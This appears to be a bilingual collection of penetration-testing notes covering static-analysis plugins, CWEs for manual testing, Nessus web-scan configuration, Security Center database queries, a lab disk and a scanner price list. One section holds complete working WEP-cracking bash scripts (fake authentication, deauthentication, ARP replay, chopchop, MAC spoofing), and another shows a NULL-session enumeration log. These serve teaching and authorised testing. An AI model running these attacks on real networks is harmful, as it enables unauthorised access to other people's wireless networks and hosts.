Ajouter des plugins de sécurité gratuits dans Eclipse | Adding free security plugins in Eclipse

Install Plugins

Install FindBugs and SonarLint by performing these steps:

• Start Eclipse
• Menu Help / Eclipse Marketplace
• Search for FindBugs, install it.
• Search for SonarLint for Eclipse, choose the optional Java Configuration Helper and install it

Add Find Security Bugs plugin for FindBugs

• Download the plugin jar file from http://find-sec-bugs.github.io
• Click Window -> Preferences then go to Java -> FindBugs
• Open Plugins and misc. Settings tab and click Add to add the Find Security Bugs plugin jar file to the list
• Restart Eclipse

Enable analysis

For each project you have in Eclipse:

• Right-click on it and click the menu Configure / Enable SonarLint

Note that Findbugs is already usable after installation so there's no need to enable it for each project.

Using Findbugs

• Right-click on the project in Eclipse and select the menu Find Bugs / Find Bugs
• Wait for the analysis to complete - a popup dialog will open, show progress and then close automatically.
• Open the Bug Explorer. The first time, you will need to select the Eclipse menu Window / Show View / Other / FindBugs / Bug Explorer

Using SonarLint

• Right click on the project in Eclipse and select the menu SonarLint / Analyze all files
• View the progress in the Eclipse Console
• View the Sonar markers in your source code.
• Occasionally update your analyzers via Help / Update SonarLint Analyzers

For a quick intro, go on the SonarLint for Eclipse web page.

Vulnérabilités communes à tester manuellement | CWEs to test manually

Vulnérabilités qui ne sont pas (toujours) bien détectées de façon automatique, qui nécessitent un test manuel (après le balayage).

Vulnerabilities that that scanners don't (always) find reliably, that warrant a manual test

• CWE-285 Improper Access Control (Authorization)
• CWE-306 Missing Authentication for Critical Function
• CWE-311 Missing Encryption of Sensitive Data [A06]
• CWE-352 Cross-Site Request Forgery (CSRF) [A08]
• CWE-434 Unrestricted Upload of File with Dangerous Type
• CWE-798 Use of Hard-coded Credentials  
• CWE-840 Business Logic Errors

Top 10 (2013)

• A02 Broken Authentication and Session  Management
• A04 Insecure Direct Object References 
• A05 Security Misconfiguration
• A06 Sensitive Data Exposure
• A08 Cross-Site Request Forgery (CSRF)
• A10 Unvalidated Redirects and Forwards

Celles qui son moins applicable or vérifiables. | Those that are less applicable (everywhere) or testable via black-box methods:

• CWE-494 Download of Code Without Integrity Check
• CWE-732 Incorrect Permission Assignment for Critical Resource
• CWE-754 Improper Check for Unusual or Exceptional Conditions
• CWE-770 Allocation of Resources Without Limits or Throttling 
• CWE-807 Reliance on Untrusted Inputs in a Security Decision
• [...]

Évidemment, cette liste est plutôt générique. On doit faire des choix selon le contexte, valider les problèmes relevés par les balayeurs (identifier les faux positifs, augmenter la sévérité/priorité selon l'exposition), essayer d'exploiter les certaines vulnérabilités récentes, essayer des nouvelles techniques, etc.

Of course, this is just a generic list. We still need to adapt our approach based on context, validate findings from scanners (identify false positives, adjust severity/priority based on exposure), try to exploit new vulns, try new techniqeus, etc.

Balayer des sites protégés contre les attaques CSRF

Pour permettre le balayage de sites protégés contre les attaques de falsification de requêtes inter-site ou "Cross-Site Request Forgery" (CSRF), un plugiciel Burp a été développé (preuve de concept). Celui-ci peut être trouvé ici http://code.google.com/p/pysqlin/downloads/list.

Tiré d'un article sur http://edge-security.blogspot.ca:

In order to perform an automatic scan of CSRF-protected sites, requests must be performed sequentially as each requests contains a new generated anti-CSRF token needed for the next request, forming a token chain.

A POC in the form of a Burp suite plugin has been developed to verify this approach, it can be downloaded at http://code.google.com/p/pysqlin/downloads/list. It should be noted however that this code is a POC and it requires further development in other to be able to work against real environments (any link of a webapp with this behavior is appreciated).

Original post origin: http://edge-security.blogspot.ca.

Configurer Nessus pour des balayages d’applications web

Lorsqu’on utilise Nessus pour balayer un site web, il est important de bien configurer les paramètres globaux pour aller chercher le maximum de vulnérabilités.
Le site de support de Tenable contient un bon article qui explique comment on fait. J’ai copié ici-bas les détails (en Anglais).

Sommaire:

• On peut importer des cookies pour faciliter l’accès avec pré-authentification
• Pour obtenir un fichier qui contient des cookies actifs, on peut utiliser Firefox et exporter ses cookies via un ajout tel que Export Cookie
• Il est aussi très important d’ajuster quelques paramètres dans Nessus: Enable CGI scanning, HTTP Cookies import, Web App Test Settings, ajouter des points de départs de balayage dans Web Mirroring, (+ utiliser des plugins qui utilisent ces paramètres)

Problem:

What needs to be configured to ensure a thorough web application audit is performed by Nessus?

Solution:

Tenable encourages users to run a full vulnerability scan with all plugins enabled. If you want to streamline a policy to only focus on a web application, the following steps outline the process for creating a new policy designed to run a web application audit:

1. Create a new policy. (Policies -> Add)
2. Under the “General” tab options, set up a scan as you normally would. Ensure at least one TCP-based port scanner is selected and provide a list of ports with web servers running on the host(s). Note: Only use this method if you are absolutely sure you know of all web servers running on the targets. Otherwise, select a port range so that Nessus can detect web servers and applications to audit.
3. Under the “Plugins” tab, ensure the following plugin families are enabled:
   1. CGI abuses – This plugin family checks for a wide range of commercial and open source applications that have documented vulnerabilities. These checks include software detection, information disclosure, SQL injection, file inclusion, overflows and more.
   2. CGI abuses : XSS – This plugin family checks for a wide range of commercial and open source applications that have documented Cross-site Scripting (XSS) vulnerabilities.
   3. Database – Many web applications will utilize a database for storing large amounts of data. SQL injection attacks are designed to target database servers via web applications.
   4. FTP – Some sites use FTP for administrators to upload web application content or update the application.
   5. General – This plugin family contains plugins that identify operating systems via HTTP, perform a wide variety of SSL checks and more.
   6. Service detection – Contains checks for a wide variety of services and technologies, many of which support web servers and applications.
   7. Web servers – This plugin family contains over 500 checks for vulnerabilities in popular web servers including Apache, Tomcat, IIS and WebSphere. In addition, this plugin family includes checks for frameworks such as PHP, common web server issues associated with the HTTP(S) protocol, OpenSSL checks and more.
4. Under the “Preferences” tab, there are several drop-down menus with additional configuration options that must be specified:
   1. Under “Global variable settings”, select “Enable CGI scanning”. Optionally, the “Thorough tests (slow)” can be enabled and “Report verbosity” can be set to “Verbose” to provide additional vulnerability checks and better reporting.
   2. The “HTTP cookies import” drop-down can be used to import cookies as a means for authenticating to the application. This is not explicitly required, but some means of authentication should be provided.
   3. The “HTTP login page” drop-down provides over a dozen options that direct Nessus to a custom web application. This includes the URL to the login page (e.g., /application/login.php), login form (i.e., if the login data is sent to a different location), relevant form fields for authentication (the “user” and “pass” variables should be changed to reflect your application, %USER% and %PASS% are pulled from the “Login configurations” drop-down menu) and options that control how Nessus behaves in relation to the authentication process.
   4. The “Login configurations” can be used if the application is protected using HTTP Basic Authentication, Digest or NTLM.
   5. The “Web Application Tests Settings” drop-down contains several important options for enabling testing of custom applications. The “Enable web applications tests” must be enabled, or Nessus will only scan for known vulnerabilities based on prior public disclosures. This page also contains options for limiting the time to test an application, use of POST requests, the type of argument values to use (refer to the Nessus User Guide for additional information on this option) and more.
   6. The “Web mirroring” drop-down directs Nessus’ behavior for mirroring the application, a step performed before tests are calculated and run. The total number of pages or depth of mirroring can be controlled, along with the starting page and a delimited list of regular expressions that are used to match web pages that Nessus will exclude (e.g., logout|emailus.php).

For more information about the settings you can watch our instructional videos at:
http://www.youtube.com/watch?v=fUCgvZnTILo
http://www.youtube.com/watch?v=B5qvVT9iho0
Additionally, you can find detailed information on the preferences in the Nessus User Guide.
Other Refs:

• From the Discussions Forum, another related post regarding the use of cookie importing: https://discussions.nessus.org/thread/4395

• The missing link in the Nessus docs is that to get the cookie file, you need to use Firefox and export using an add-on such as: https://addons.mozilla.org/en-US/firefox/addon/export-cookies/?src=api

• Also very important is to tweak a few settings in Nessus: Enable CGI scanning, HTTP Cookies import, Web App Test Settings, Web Mirroring starting points (+ choose some plugins that use these)

Nessus, IID & botnet detection

Brought to you by Tenable…
Nessus uses data provided by Internet Identity IID, a company that maintains a list of hosts it has determined through various technical means are part of a botnet. Nessus does not perform the technical checks itself; rather it compares the IP addresses being scanned against a list maintained by IID. Inclusion in IID’s list is typically accurate, they experience a very low rate of false positives.
If a host is reported as part of a botnet, there are several things you can do to help validate the finding and respond to the issue:

1. Check the host against additional third-party lists to determine if the host shows up in those resources: http://isc.sans.edu/sources.html, http://www.malwaredomains.com, http://www.ipvoid.com
2. Check the host against known Unsolicited Bulk E-mail UBE/spam blacklists: http://www.dmoz.org/Computers/Internet/E-mail/Spam/Blacklists
3. Look for any evidence of the host being compromised e.g., suspicious activity, newly installed software, machine resources being heavily utilized.
4. Perform a full vulnerability scan to determine if any high-risk or critical vulnerabilities are present, that may represent the point of intrusion. Ensure web application auditing is enabled, as Nessus can identify malicious web content related to botnet activities.
5. Move the host to an isolated network and use a network sniffer to monitor traffic being sent from the machine.

If you still have questions about your host appearing in the list, you can contact IID at activeknowledge.signals.requests@internetidentity.com with questions. Your initial mail should include the IP address in question, when the IP was reported i.e., when you ran your Nessus scan and any additional information about the host that may be relevant.via Tenable Customer Support Portal (for registered users).

Tenable Security Center et sqlite

Le produit Tenable Security Center utilise une BD sqlite. Voici quelques commande qui aident à extraire de l’information de la BD de Security Center, en utilisant la commande sqlite3…

Tenable Security Center uses an sqlite database. Here’s a few commands to help extract data out of database files.

# cd /opt/sc4
# /opt/sc4/support/bin/sqlite3 application.db “.tables”
AcceptRiskRules                   AppStyle
AdminDashboardTab                 AppStyleAttribute
AdminPreferences                  AppStyleFamily
AdminUser                         AppStyleFamilyMapping
AppAuditFile                      AppWindowsCredential
AppAuditFilePlugins               AssetTemplate
AppCredential                     AssetTemplateClause
AppDashboardComponent             AssetTemplateClauseGroup
AppDashboardTab                   Configuration
AppDataTimestamps                 CorrelatedRepositoryLCE
AppKerberosCredential             Email
AppPolicy                         LCE
AppPolicyAuditFile                LCESilo
AppPolicyDisabledPlugins          LCETypes
AppPolicyEnabledPlugins           OrgLCE
AppPolicyFamily                   OrgRepository
AppPolicyPluginPrefs              Organization
AppPolicyTemplate                 PassiveScanner
AppPolicyTemplateAuditFile        PassiveScannerRepository
AppPolicyTemplateDisabledPlugins  RecastRiskRules
AppPolicyTemplateEnabledPlugins   Repository
AppPolicyTemplateFamily           Scanner
AppPolicyTemplatePluginPrefs      UserAuth
AppReportTemplate                 Zone
AppRole                           ZoneOrganization
AppSNMPCredential                 ZoneScanner
AppSSHCredential                  sc4Schema
AppSchedule
# /opt/sc4/support/bin/sqlite3 jobqueue.db “.tables”
JobQueue   sc4Schema
# /opt/sc4/support/bin/sqlite3 application.db “SELECT * FROM Configuration”
[...]
# /opt/sc4/support/bin/sqlite3 application.db “.schema”
[...]
CREATE TABLE [Configuration] (
[type] INTEGER,
[name] VARCHAR NOT NULL,
[value] VARCHAR NOT NULL,
[visible] BOOLEAN NOT NULL DEFAULT ‘true’
, [editable] BOOLEAN NOT NULL DEFAULT ‘true’);
CREATE TABLE [CorrelatedRepositoryLCE] (
[repID] INTEGER NOT NULL,
[lceID] INTEGER NOT NULL
);
[...]

Hackerdemia Disk Information and Download Link

Following is direct excerpt of the heorot forum.
 
Get the current Hackerdemia PenTest Tool Tutorial disk

The MD5 Hash Value: 09e960360714df7879679dee72ce5733

How to start the disk:
Boot the LiveCD on a system within your pentest lab, which needs to be configured to be in the 192.168.xxx.xxx range.
Connect to http://192.168.1.123 using a web browser (preferably in BackTrack or your favorite pentest platform)

You will be presented with a web page, which is your tutorials. All hands-on examples were created with the Hackerdemia disk as the target, so your results should exactly match those found in the tutorials.

Where to get the BackTrack disk:
http://remote-exploit.org/backtrack_download.html

Network configuration:
The LiveCD configures itself to an IP address of 192.168.1.123 by default. If you want to change it, simply log in as:
username: root
password: toor

...and change the ifconfig information (If you don't know what I'm talking about, go to: http://en.wikipedia.org/wiki/Ifconfig )"

See also:
http://heorot.net/instruction/tutorials/iso/hackerdemia-1.1.0.iso
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.100-1.1.iso
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.110-1.0.iso

Conficker Eye Chart

The Conficker Eye Chart helps end-users determine if they are infected with Conficker. If indeed you are infected, please make sure that you remove it properly. This may mean reinstallation but before you do that, visit the repair tools list. Actually, here's an even bigger list.

Vulnerability assessment tools

Application Security DbProtect [$30,000 for 5 DB]
Enterprise-class database security, risk and compliance suite. It combines discovery, vulnerability scanning, real-time activity monitoring, auditing and intrusion detection to help organizations reduce risk and enhance compliance throughout their database infrastructure. This product can protect databases from internal and external threats, as well as ensuring regulatory compliance. SC Review

Auditor Assuria [$3,800 starter pack: central software + 5 agents]
Security and compliance scanner for enterprise servers. This product features capabilities, such as vulnerability assessment, system change detection, system information and regulatory compliance. The Auditor can actively scan systems using agents deployed across the enterprise network, and these agents report back to the main console. SC Review

Cenzic Hailstorm ARC [$26,000]
Web application vulnerability scanner. This product can scan websites and web applications in the enterprise to see how vulnerable they are to possible attack from hackers. This application can also go above and beyond standard scanning by providing complete risk analysis and compliance checks as well. SC Review

Core Security Technologies Core Impact Pro 8 [$30,000/year]
One of our favorite tools is back this year and it's better than ever. Core Impact Pro 8 is the ultimate tool in vulnerability assessment and penetration testing. It provides a comprehensive suite of features gathered in one place. This product can be used to scan and exploit systems using multiple modules for information gathering, exploitation, local information gathering, privilege escalation, pivoting, and clean-up and reporting. This tool also deploys agents that run in the target's memory if a target can be exploited. SC Review

eEye Digital Security Retina [$575 for 32 IPs]
Multi-platform vulnerability management. Retina identifies known and zero-day vulnerabilities and provides security risk assessment, enabling security best practices, policy enforcement and compliance with regulatory audits. This product analyzes specific pieces of the operating system, applications and policies. The tool targets high-risk host components and how a cybercriminal could potentially leverage them for malicious activity. SC Review

GFI LANguard [10-24 IPs at $32/IP]

Vulnerability assessment engine able to discover more than 15,000 vulnerabilities, including Microsoft missing patches in various languages. This product can scan and discover vulnerabilities across the network. It uses an update engine, which runs in real time and synchronizes the local vulnerability database with the latest releases from Microsoft, CVE, OVAL and SANS. SC Review

IBM ISS Network Enterprise Scanner [$7,250]
Proactive tool that accelerates time to risk reduction by prioritizing vulnerability remediation tasks. It eliminates manual steps by allowing continuous automated scanning across multiple network segments from a single appliance. It helps you leverage existing investments and decrease the cost of ownership through IT system integration (ISS SiteProtector, Virtual Patching). It helps identify existing IT risks and enables you to observe due diligence in conforming to regulatory requirements. CC Eval. CVE Support.

IBM Rational AppScan [starts at $17,500]
Protects against the threat of attacks and data breaches. Web application security, including new Malware detection capabilities, can be used for vulnerability scanning in all stages of application development and by testers with or without security expertise. SC Review.

McAfee Vulnerability Manager [$16,820 for 1,000 IP addresses]
Network vulnerability scanner and network auditing tool. This appliance can actively discover and scan network assets across the enterprise looking for possible threats that leave these assets vulnerable to attack. Vulnerability Manager does this using its very versatile scanning engine. SC Review

netVigilance SecureScout NX [$595]
network vulnerability scanning tool that at first glance looks like a scanning tool from times past. However, this product packs a serious punch. The SecureScout can scan almost anything that has an IP address - be it firewalls, routers, operating systems or anything else you can find to throw at it. The tool can also do in-depth firewall testing and scan multiple subnets from one console. SC Review

N-Stalker Web Application Security Scanner [$1,399/URL, $6,299 unlimited]
Assesses a web application against a wide range of vulnerabilities, including the application layer and infrastructure layer. Scans for the application layer are based on the Open Web Application Security Project (OWASP) Top 10 and Common Weakness Enumeration (CWE) Top 25. Scans against the infrastructure layer include more than 35,000 signatures for server and third-party packages. SC Review

Ounce Labs Ounce 6 [$30,000]
Static source code security analysis. It will analyze any application written in C/C++, Java/JSP, .NET (C#, VB .NET, ASP.NET), Classic ASP (VBScript, JavaScript) and Visual Basic 6. This product provides a way to carefully examine any source code written in these languages for possible holes and vulnerabilities. These applications do not need to be web-based. Any source code can be tested. SC Review

Saint Saint Suite [$2,695 for a Class C]
Vulnerability scanning across a vast number of platforms, routers and basically anything else with an IP address. It can also try to exploit and penetrate those vulnerabilities using a penetration tool. This provides an all-around overview of network vulnerabilities. SC Review

Sunbelt Software Network Security Inspector [$795-$3,495 based on employee size]
Network vulnerability scanner using a database of over 4,000 ranked multiplatform vulnerabilities. This product can perform comprehensive vulnerability assessment without causing interruptions to the machines being scanned. The tool not only detects vulnerabilities, but also shows how to remediate the threat by providing locations where, if any, applicable patches can be downloaded to fix the machine. SC Review

Anatomy of an attack

SANS: The Top Cyber Security Risks
Good attack process explanation

Security Report - Anatomy of an Attack - Introduction

Security Report - Anatomy of an Attack - Introduction

WEP cracking POC with aircrack-ng

Below you'll find my WEP key cracking script crack.sh. I use it in parallel with my capture script cap.sh to demonstrate how easy it is crack WEP. You'll need to create your own crack.conf file (after performing some reconnaissance with Kismet or airodump-ng) and then you'll see how it's easy to crack WEP.

So don't use WEP!

###!/bin/bash
# File: crack.sh
PATH=$PATH:/usr/sbin:/sbin:/home/user/bin:/home/eric/bin:/sbin:/usr/sbin:/usr/local/bin:/data/cap
SEL=""
msg()
{
echo; echo -n "== $1 "; read retkey
}

prompt()
{
echo; echo -n "== $1 "; read SEL
}

# Check calling args
if [ $# -ne 1 ]
then
echo "Syntax: $0 CONFIGNAME"; exit 1
fi
echo "== List of available WLAN interfaces:"
iwconfig 2>&1 | grep 802.11 | awk '{print $1}'
if=`iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | tail -1`

prompt "Type the interface to capture from: [$if]"
if [ "$SEL" != "" ]
then
if=$SEL
fi

# Enter network values here
CONFFILE=./crack.conf
if [ ! -x $CONFFILE ]
then
echo Config $CONFFILE is missing! Exiting.
exit 1
fi
echo "-- Reading configuration from $CONFFILE"
. $CONFFILE $1

msg 'Pls start the capture in a separate terminal'
prompt 'Run fake reauthenticationl? [y]'
if [ "$SEL" = y -o "$SEL" = "" ]
then
# Fake auth
aireplay-ng --fakeauth 0 -e "$essid" -a $bssid -h $mac0 $if
msg 'Check that association was successful'
fi

# Make choice of attack
prompt "Choose (0)deauth, (2)interactive-replay, (3)ARP-replay, (4)chopchop, (5)fragment:"
case $SEL in
0)
msg 'Will attempt deauthentication attack'
aireplay-ng -0 1 -a $bssid -h $mac1 $if
;;
2)
msg 'Will attempt replay attack interactively'
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid -h $mac0 $if

#msg 'Will attempt cracking WEP key with IVs received'
#aircrack-ng -a 1 -X -s wepch${channel}*.ivs
;;
3)
# Chop chop
msg 'Will run ARP replay'
aireplay-ng -3 -e "$ssid" -b $bssid -h $mac0 $if
;;
4|5)
# Chop chop
msg 'Will run Chop chop: choose the one where dest. MAC is not FF:FF:FF:FF:FF:FF'
aireplay-ng --chopchop -e "$ssid" -h $mac0 $if
#aireplay-ng -$SEL -e "$ssid" -b $bssid $if
msg 'Now copy the .cap file name into your clipboard (without .cap)'
prompt 'Enter the base filename here:'
read capfile

# Dump the packet to the screen
msg 'Packets captured will be dumped to the screen'
tcpdump -s 0 -n -e -r $capfile.cap
msg 'Copy the srcIP to clipboard'
echo -n 'Copy the IP here: '; read srcIP
msg 'Copy the dstIP to clipboard'
echo -n 'Copy the IP here: '; read dstIP

# Forge ARP packet
msg 'Will forge ARP packet'
packetforge-ng -0 -h $mac0 -c $mac1 -a $bssid -l $dstIP -k $srcIP -y $capfile.xor -w $arpcapfile

msg 'Will replay interactively from captured file (just select first shown)'
aireplay-ng --interactive -r $arpcapfile $if

#msg 'Will attempt cracking WEP key with IVs received'
#aircrack-ng -a 1 -X -s wepch${channel}*.ivs
;;
esac

=============================================================

###!/bin/bash
# File: cap.sh
PATH=$PATH:/usr/sbin:/sbin:/home/user/bin:/home/eric/bin:/sbin:/usr/sbin:/usr/local/bin:/data/cap
SEL=""
opts=""

#######################################
msg()
{
echo; echo -n "== $1 "; read retkey
}

prompt()
{
echo; echo -n "== $1 "; read SEL
}

usage(){
echo "Syntax: $0 (no args: interactive)"
echo " $0 IF -f CONFIGNAME [AIRODUMP-NG_OPTS]"
echo " $0 IF -c CHANNEL [AIRODUMP-NG_OPTS]"
}
#######################################
readConfig(){
CONFNAME=$1
shift

# Enter network values here
CONFFILE=./crack.conf
if [ ! -x $CONFFILE ]
then
echo Config $CONFFILE is missing! Exiting.
exit 1
fi
echo "-- Reading configuration from $CONFFILE"
. $CONFFILE $CONFNAME
opts="--bssid $bssid" # Filter APs by BSSID
opts="$opts -w $CONFNAME-ch$channel" # Dump file prefix
opts="$opts -t $type" # Filter APs by cipher suite
opts="$opts --band $band" # Band on which airodump-ng should hop (abg)
opts="$opts --channel $channel" # Capture on specific channels
opts="$opts $*"
}
#######################################
capture(){
#opts="$opts --ivs" # Save only captured IVs
#opts="$opts --gpsd" # Use GPSd
opts="$opts --update 2" # Display update delay in seconds
#opts="$opts --showack" # Prints ack/cts/rts statistics
#opts="$opts -h" # Hides known stations for --showack
#opts="$opts -f 1000" # Time in ms between hopping channels
opts="$opts -a" # Filter unassociated clients

if [ "$mac0" != "" ]
then
prompt "Change MAC to $mac0? [n]"
if [ "$SEL" = "y" ]
then
./wlanconfig.sh $if monitor $mac0
fi
else
prompt "Configure for $if for monitoring mode? [n]"
if [ "$SEL" = "y" ]
then
./wlanconfig.sh $if monitor
fi
fi
cmd="airodump-ng $opts $if"
msg "About to run: $cmd"
cd dump
$cmd

prompt "Configure $if back to normal managed mode? [n]"
if [ "$SEL" = "y" ]
then
cd ..
./wlanconfig.sh $if managed
fi
}
#######################################
interact(){
echo "== List of available WLAN interfaces:"
iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | sort
if=`iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | sort | tail -1`

prompt "Type the interface to capture from: [$if]"
if [ "$SEL" != "" ]
then
if=$SEL
fi

prompt "Use a known configuration? [n]"
if [ "$SEL" = "y" ]
then
prompt "Enter config name:"
readConfig $SEL
return
fi

prompt "Capture on a specific channel? [n]"
if [ "$SEL" = "y" ]
then
channel=1
prompt "Enter channel number: [$channel]"
if [ "$SEL" != "" ]
then
channel=$SEL
fi
opts="--channel $channel"
opts="$opts -w ch$channel" # Dump file prefix
fi
prompt "Filter on cypher (OPN|WEP|WPA|WPA1|WPA2)? [All]"
if [ "$SEL" != "" ]
then
opts="$opts -t $SEL"
fi
}
#######################################

# Check calling args
if [ $# -eq 1 ]
then
usage
exit 1
fi
if [ $# -ge 2 ]
then
if=$1 ; shift;
op=$1 ; shift
else
op=interactive
fi

case $op in
-c)
channel=$1
shift
opts="-w ch$channel" # Dump file prefix
opts="$opts -c $channel" # Capture on specific channels
opts="$opts $*"
capture
;;
-f)
readConfig $*
capture
;;
interact*)
interact $*
capture
;;
*)
usage
esac

=========================================================

###!/bin/bash
# File: wlanconfig.sh
PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin

printUsage(){
echo
echo "Usage: $0 IF MODE [NEWMAC]"
echo
echo "Examples:"
echo " $0 ath0 managed"
echo " $0 ath0 monitor"
echo " $0 wlan0 monitor"
echo " $0 wlan0 monitor 11:22:33:44:55:66"
echo
}

if [ $# -lt 2 ]
then
printUsage
exit 1
fi

case $2 in
managed)
mode=sta
;;
monitor)
mode=monitor
;;
*)
printUsage
exit 1
esac

if=$1
bif=$1
modecmd=$2
mac=$3

echo "-- Bringing $if down"
ifconfig $if down

# Set base interface to wifi0 if it's Atheros/madwifi
if [ $if = ath0 -o $if = ath1 ]
then
bif=wifi0
fi

if [ "$mac" != "" ]
then
echo "-- Changing MAC of $bif to $mac"
macchanger --mac $mac $bif
fi

# Special execution for Atheros/madwifi
if [ $if = ath0 -o $if = ath1 ]
then
echo "-- Destroying $if"
wlanconfig $if destroy

echo "-- Creating $if in $modecmd mode"
wlanconfig $if create wlandev $bif wlanmode $mode
else
#airmon-ng stop $if
#airmon-ng start $if
echo "-- Configuring $if for $modecmd mode"
iwconfig $if mode $modecmd
fi

echo "-- Bringing $if up"
ifconfig $if up

==============================================================

# File: Sample crack.conf
#if=wlan1 ; mac0=00:1B:2F:A9:D1:B9 # Orig MAC (rtl8087l)
#if=wifi0 ; mac0=06:23:4D:00:82:7C # Atheros 5007
#if=ath1 ; mac0=06:23:4D:00:82:7C # Atheros 5007
#if=wlan0 ; mac0=00:1B:2F:A9:D1:B9 # Orig MAC (rtl8087l)

case $1 in
*)
channel=6 # Wireless channel
essid="TESTSSID" # SSID
bssid=00:18:39:C4:F6:85 # MAC of AP
mac0=00:29:2F:E5:AA:15 # Masquerading as internal MAC (if required by AP)
mac1=00:1F:F3:F9:C1:B1 # MAC of known target
# key=C3E07361D029ACEE81234446B4 (saved here after cracking)
type=WEP
band=g
;;
esac

Exploiting NULL session

With PC Firewall:
C:\>nmap -sU -sA -p1-1000 192.168.10.165

Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-26 15:38 Eastern Standard Tim

Interesting ports on 192.168.10.165:
Not shown: 1000 open|filtered ports, 997 filtered ports
PORT STATE SERVICE
135/tcp unfiltered msrpc
139/tcp unfiltered netbios-ssn
445/tcp unfiltered microsoft-ds
MAC Address: 00:1E:68:D5:58:72 (Quanta Computer)

Nmap done: 1 IP address (1 host up) scanned in 14.69 seconds
C:\>net use \\192.168.10.165\IPC$ "" /u:""
System error 53 has occurred.


Without PC Firewall
C:\>nmap -sU -sS -p1-1000 192.168.10.165

Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-26 15:35 Eastern Standard Time

Interesting ports on 192.168.10.165:
Not shown: 1990 closed ports
PORT STATE SERVICE
9/tcp filtered discard
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
9/udp open|filtered discard
123/udp open|filtered ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
MAC Address: 00:1E:68:D5:58:72 (Quanta Computer)

Nmap done: 1 IP address (1 host up) scanned in 8.80 seconds

C:\>net use \\192.168.10.165\IPC$ "" /u:""
The command completed successfully.

C:\>net view \\192.168.10.165
System error 5 has occurred.

Access is denied.

Probably means that the following registry key is set to 1:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous

If it's set to 0 (and no firewall), you get the following output instead:

Simple conversion of nmap output in XML to CSV using XSLT

Here's a simple nmap.xsl file to include in the same directory as the nmap XML output file (replace all curly braces with the greater/smaller than signs):

{?xml version="1.0" encoding="UTF-8"?}
{xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:fo="http://www.w3.org/1999/XSL/Format"}
{xsl:output method="html" indent="yes" encoding="UTF-8"/}
{xsl:template match="/nmaprun"}host,protocol,port,service,state,
{xsl:apply-templates select="host"} {/xsl:apply-templates}
{/xsl:template}
{xsl:template match="host"}
{xsl:for-each select="ports/port"}
{xsl:value-of select="../../hostnames/hostname/@name"/},{xsl:value-of select="@protocol"/},{xsl:value-of select="@portid"/},{xsl:value-of select="service/@name"/},{xsl:value-of select="state/@state"/},
{/xsl:for-each}
{xsl:apply-templates/}
{/xsl:template}
{/xsl:stylesheet}

On Windows
1. Run nmap. For example: nmap.exe -T3 -sS -sV -p1-9000 -oX nmap-out.xml 10.10.1.1-254
2. Convert the file by using: msxsl nmap-out.xml nmap.xsl -o nmap-out.csv

I'm about to test the same thing on Linux...

To download the msxsl utility, go here